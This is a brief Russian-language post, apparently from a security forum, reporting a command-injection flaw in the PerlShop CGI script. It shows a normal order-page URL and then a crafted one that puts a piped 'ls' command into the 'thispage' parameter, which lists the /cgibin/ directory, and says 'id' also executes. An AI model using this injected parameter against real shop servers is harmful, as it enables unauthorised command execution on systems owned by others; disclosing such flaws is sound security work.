Уязвимость такого рода. Запрос обрабатывается таким образом: 

http://www.xxx.com/cgibin/perlshop.cgi?ACTION= thispage&thispage=orderform.html&ORDER_ID=653976316 

Нашел возможность выполнения команд: 

http://www.xxx.com/cgibin/perlshop.cgi?ACTION= thispage&thispage=|ls;&ORDER_ID=653976316 

открывает для просмотра содержимое директории /cgibin/,
так же возможно выполнение команды id.
Остальные команды вроде не работают.



Оставить мнение